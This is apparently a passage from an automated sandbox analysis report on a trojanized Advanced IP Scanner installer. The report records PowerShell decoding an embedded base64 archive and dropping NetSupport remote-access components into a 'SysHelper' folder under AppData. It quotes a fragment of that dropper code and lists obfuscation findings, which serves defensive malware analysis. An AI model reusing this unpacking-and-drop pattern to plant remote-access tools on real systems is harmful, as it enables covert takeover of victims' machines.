Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2083823196.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2164887395.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: ws\Mion.pdb source: powershell.exe, 00000005.00000002.2038454722.00000000076C2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdb source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: C:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5WinExtras.pdb00 source: is-JTIOC.tmp.1.dr
Source:	Binary string: client32.pdb\1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: is-2I7SK.tmp.1.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: is-7V6MF.tmp.1.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: is-DFL4O.tmp.1.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: is-56ICT.tmp.1.dr
Source:	Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdbP` source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr
Source:	Binary string: \1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: is-8VUCH.tmp.1.dr
Source:	Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: is-853KO.tmp.1.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: is-JPUOQ.tmp.1.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: is-SF594.tmp.1.dr
Source:	Binary string: msvcr100.i386.pdb source: powershell.exe, 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000007.00000002.4193839189.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 00000008.00000002.2084472036.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 0000000A.00000002.2165360601.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdb source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: is-GHBG6.tmp.1.dr
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdbss' source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdb source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr
Source:	Binary string: System.Management.Automation.pdbrq source: powershell.exe, 00000005.00000002.2038454722.00000000076DB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbcV source: powershell.exe, 00000005.00000002.2043434808.00000000087B9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb"" source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2095942148.000000000018C000.00000004.00000010.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5PrintSupport.pdb44 source: is-7MB5M.tmp.1.dr
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2095942148.000000000018C000.00000004.00000010.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: client32.pdb source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.5.dr
Source:	Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdbt3 source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5WinExtras.pdb source: is-JTIOC.tmp.1.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000007.00000002.4194011069.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 00000008.00000002.2084695368.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000A.00000002.2165556205.0000000068895000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: is-2I7SK.tmp.1.dr
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5PrintSupport.pdb source: is-7MB5M.tmp.1.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: is-NKCKG.tmp.1.dr

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($base64Content);[System.IO.File]::WriteAllBytes($zipFileName, $decodedBytes);New-Item -ItemType Directory -Path $destinationPath;Expand-Archive -Path $zipFileName -DestinationPath $de

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,GetProcAddress,GetLastError,_free,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,

7_2_11029230

PE file contains sections with non-standard names

Source: Advanced_IP_Scanner_2.5.4594.12.exe	Static PE information: section name: .didata
Source: Advanced_IP_Scanner_2.5.4594.12.tmp.0.dr	Static PE information: section name: .didata
Source: is-CD8F9.tmp.1.dr	Static PE information: section name: .didata
Source: is-853KO.tmp.1.dr	Static PE information: section name: .didat
Source: is-GUAOM.tmp.1.dr	Static PE information: section name: .00cfg
Source: is-CJFIB.tmp.1.dr	Static PE information: section name: .qtmetad
Source: is-T9A9E.tmp.1.dr	Static PE information: section name: .qtmetad
Source: PCICL32.DLL.5.dr	Static PE information: section name: .hhshare

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_079D9CE5 push FFFFFFE8h; ret	5_2_079D9CE9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_089538DF push 8B08953Ch; retf	5_2_089538EB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08950C50 push eax; ret	5_2_08950C63
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08950EA8 push esp; ret	5_2_08950F83
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08950FBC push esp; ret	5_2_08950F83
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1116B825 push ecx; ret	7_2_1116B838
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11166719 push ecx; ret	7_2_1116672C
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11040641 push 3BFFFFFEh; ret	7_2_11040646
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685C6BBF push ecx; ret	7_2_685C6BD2
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685C4DF5 push 685C43F9h; retf	7_2_685C4E1F
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685B8377 push 3BFFFFFFh; retf	7_2_685B837C
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685BE36C push edi; ret	7_2_685BE37B
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685BE3F7 push edi; ret	7_2_685BE3F9
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685B94C5 push ecx; ret	7_2_685B94D8
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_687E0995 push ecx; ret	7_2_687E09A8
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1116B825 push ecx; ret	8_2_1116B838
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11166719 push ecx; ret	8_2_1116672C
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11040641 push 3BFFFFFEh; ret	8_2_11040646

Source: msvcr100.dll.5.dr

Static PE information: section name: .text entropy: 6.909044922675825

Persistence and Installation Behavior

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\printsupport\windowsprintersupport.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-N93NO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-G3D36.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-VRSD9.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\pcre.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-H6NSK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-SF594.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\ucrtbase.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-92959.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-3SOVH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-MMC0L.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-IENMB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-IUPCJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-debug-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-PIDI5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-JTIOC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-P26AP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-7V6MF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-NKCKG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-stdio-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-BSRNO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-private-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-DUVAI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-memory-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-853KO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-utility-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-handle-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-time-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-sysinfo-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-IGVP5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-datetime-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l2-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-convert-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-filesystem-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-KNEGU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-util-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-CQ3UL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-conio-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-D20H8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-46V0R.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-2-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-1.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\HTCTL32.DLL	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-FRMIK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-SCCPB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\vcruntime140.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-localization-l1-2-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-O0KOL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_console.exe (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\TCCTL32.DLL	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-heap-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\msvcp140.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-7MB5M.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-KATLC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-NE6KC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-OJCV9.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-interlocked-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-91UK3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-PLELM.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-CEPGI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-DFCT3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-JPUOQ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-runtime-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-rtlsupport-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-GUAOM.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-JFL1I.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\remcmdstub.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-2I7SK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-OBI2J.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-OT0US.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-multibyte-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\pcicapi.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-CD8F9.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-8VUCH.tmp	Jump to dropped file
